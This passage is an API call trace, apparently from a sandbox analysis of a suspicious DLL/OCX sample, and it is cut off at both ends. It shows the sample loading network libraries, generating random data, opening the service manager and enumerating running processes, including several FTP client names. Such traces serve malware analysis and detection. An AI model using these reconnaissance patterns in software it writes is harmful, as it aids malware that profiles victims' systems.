Flags=0x8, Size=0x18) returned 0x5b2ce0 [0088.177] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7ffe95df0000 [0088.177] GetProcessHeap () returned 0x5a0000 [0088.177] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2ce0 | out: hHeap=0x5a0000) returned 1 [0088.177] GetProcessHeap () returned 0x5a0000 [0088.177] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b2bc0 [0088.177] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x7ffe8ac40000 [0088.197] GetProcessHeap () returned 0x5a0000 [0088.197] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2bc0 | out: hHeap=0x5a0000) returned 1 [0088.197] GetProcessHeap () returned 0x5a0000 [0088.197] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b2a80 [0088.197] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x7ffe93d60000 [0088.202] GetProcessHeap () returned 0x5a0000 [0088.202] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2a80 | out: hHeap=0x5a0000) returned 1 [0088.203] GetProcessHeap () returned 0x5a0000 [0088.203] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b2bc0 [0088.203] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x7ffe89ce0000 [0088.778] GetProcessHeap () returned 0x5a0000 [0088.779] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2bc0 | out: hHeap=0x5a0000) returned 1 [0088.779] GetProcessHeap () returned 0x5a0000 [0088.779] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x20) returned 0x5b4c90 [0088.779] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x7ffe92df0000 [0088.914] GetProcessHeap () returned 0x5a0000 [0088.914] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4c90 | out: hHeap=0x5a0000) returned 1 [0088.915] GetProcessHeap () returned 0x5a0000 [0088.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x40) returned 0x5b7e90 [0088.915] GetProcessHeap () returned 0x5a0000 [0088.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4000) returned 0x5c8d80 [0088.916] GetProcessHeap () returned 0x5a0000 [0088.916] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x8) returned 0x5a6c60 [0088.916] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce568, pszAlgId="RNG", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xce568) returned 0x0 [0088.918] GetProcessHeap () returned 0x5a0000 [0088.918] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a6c60 | out: hHeap=0x5a0000) returned 1 [0088.919] BCryptGenRandom (in: hAlgorithm=0x5bf3d0, pbBuffer=0x5c8d80, cbBuffer=0x4000, dwFlags=0x0 | out: pbBuffer=0x5c8d80) returned 0x0 [0088.919] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5bf3d0, dwFlags=0x0 | out: hAlgorithm=0x5bf3d0) returned 0x0 [0088.919] GetProcessHeap () returned 0x5a0000 [0088.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x230) returned 0x5bf5c0 [0088.920] GetModuleFileNameW (in: hModule=0x1dc0000, lpFilename=0x5bf5e4, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\5dq6swcmd.dll.ocx")) returned 0x2b [0088.921] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x5b4c90 [0088.930] CloseServiceHandle (hSCObject=0x5b4c90) returned 1 [0088.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f0 [0088.947] Process32FirstW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0088.948] GetCurrentProcessId () returned 0xb54 [0088.948] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0088.949] GetCurrentProcessId () returned 0xb54 [0088.949] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0088.949] GetCurrentProcessId () returned 0xb54 [0088.949] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0088.950] GetCurrentProcessId () returned 0xb54 [0088.950] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0088.951] GetCurrentProcessId () returned 0xb54 [0088.951] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0088.952] GetCurrentProcessId () returned 0xb54 [0088.952] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0088.953] GetCurrentProcessId () returned 0xb54 [0088.953] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0088.954] GetCurrentProcessId () returned 0xb54 [0088.954] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0088.957] GetCurrentProcessId () returned 0xb54 [0088.957] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.957] GetCurrentProcessId () returned 0xb54 [0088.957] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.958] GetCurrentProcessId () returned 0xb54 [0088.958] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0088.959] GetCurrentProcessId () returned 0xb54 [0088.959] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5f, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.960] GetCurrentProcessId () returned 0xb54 [0088.960] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.961] GetCurrentProcessId () returned 0xb54 [0088.961] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.961] GetCurrentProcessId () returned 0xb54 [0088.962] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.962] GetCurrentProcessId () returned 0xb54 [0088.962] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.963] GetCurrentProcessId () returned 0xb54 [0088.963] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.964] GetCurrentProcessId () returned 0xb54 [0088.964] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x478, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.965] GetCurrentProcessId () returned 0xb54 [0088.965] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0088.966] GetCurrentProcessId () returned 0xb54 [0088.966] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0088.966] GetCurrentProcessId () returned 0xb54 [0088.966] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.967] GetCurrentProcessId () returned 0xb54 [0088.967] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0088.968] GetCurrentProcessId () returned 0xb54 [0088.968] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.969] GetCurrentProcessId () returned 0xb54 [0088.969] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0088.970] GetCurrentProcessId () returned 0xb54 [0088.970] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0088.971] GetCurrentProcessId () returned 0xb54 [0088.971] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0088.972] GetCurrentProcessId () returned 0xb54 [0088.972] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0088.973] GetCurrentProcessId () returned 0xb54 [0088.973] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0088.974] GetCurrentProcessId () returned 0xb54 [0088.974] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0088.975] GetCurrentProcessId () returned 0xb54 [0088.975] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0088.976] GetCurrentProcessId () returned 0xb54 [0088.976] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0088.977] GetCurrentProcessId () returned 0xb54 [0088.977] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0088.978] GetCurrentProcessId () returned 0xb54 [0088.978] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0088.978] GetCurrentProcessId () returned 0xb54 [0088.979] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0088.979] GetCurrentProcessId () returned 0xb54 [0088.979] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x66c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0088.980] GetCurrentProcessId () returned 0xb54 [0088.980] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="employee.exe")) returned 1 [0088.981] GetCurrentProcessId () returned 0xb54 [0088.981] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="structure_indeed.exe")) returned 1 [0088.982] GetCurrentProcessId () returned 0xb54 [0088.982] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beatdeal.exe")) returned 1 [0088.983] GetCurrentProcessId () returned 0xb54 [0088.983] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="my-technology.exe")) returned 1 [0088.984] GetCurrentProcessId () returned 0xb54 [0088.984] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="away.exe")) returned 1 [0088.985] GetCurrentProcessId () returned 0xb54 [0088.985] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="education process memory.exe")) returned 1 [0088.986] GetCurrentProcessId () returned 0xb54 [0088.986] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="period.exe")) returned 1 [0088.987] GetCurrentProcessId () returned 0xb54 [0088.987] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_wear.exe")) returned 1 [0088.987] GetCurrentProcessId () returned 0xb54 [0088.987] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious-wonder-win.exe")) returned 1 [0088.988] GetCurrentProcessId () returned 0xb54 [0088.988] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="addressseasonlow.exe")) returned 1 [0088.989] GetCurrentProcessId () returned 0xb54 [0088.989] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="newspapertrypositive.exe")) returned 1 [0088.990] GetCurrentProcessId () returned 0xb54 [0088.990] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="containhowever.exe")) returned 1 [0088.991] GetCurrentProcessId () returned 0xb54 [0088.991] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="amount-bad.exe")) returned 1 [0088.991] GetCurrentProcessId () returned 0xb54 [0088.991] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="various.exe")) returned 1 [0088.992] GetCurrentProcessId () returned 0xb54 [0088.992] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="military.exe")) returned 1 [0088.993] GetCurrentProcessId () returned 0xb54 [0088.993] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coach_wait_small.exe")) returned 1 [0088.994] GetCurrentProcessId () returned 0xb54 [0088.994] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pressure_former.exe")) returned 1 [0088.995] GetCurrentProcessId () returned 0xb54 [0088.995] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="project.exe")) returned 1 [0088.996] GetCurrentProcessId () returned 0xb54 [0088.996] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="body.exe")) returned 1 [0088.997] GetCurrentProcessId () returned 0xb54 [0088.997] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="though.exe")) returned 1 [0088.998] GetCurrentProcessId () returned 0xb54 [0088.998] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0088.998] GetCurrentProcessId () returned 0xb54 [0088.998] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0089.000] GetCurrentProcessId () returned 0xb54 [0089.000] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0089.005] GetCurrentProcessId () returned 0xb54 [0089.005] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0089.006] GetCurrentProcessId () returned 0xb54 [0089.006] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0089.007] GetCurrentProcessId () returned 0xb54 [0089.007] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0089.009] GetCurrentProcessId () returned 0xb54 [0089.009] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0089.010] GetCurrentProcessId () returned 0xb54 [0089.010] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, 